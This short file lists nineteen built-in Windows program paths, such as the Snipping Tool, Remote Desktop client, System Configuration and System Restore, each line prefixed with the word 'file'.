file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe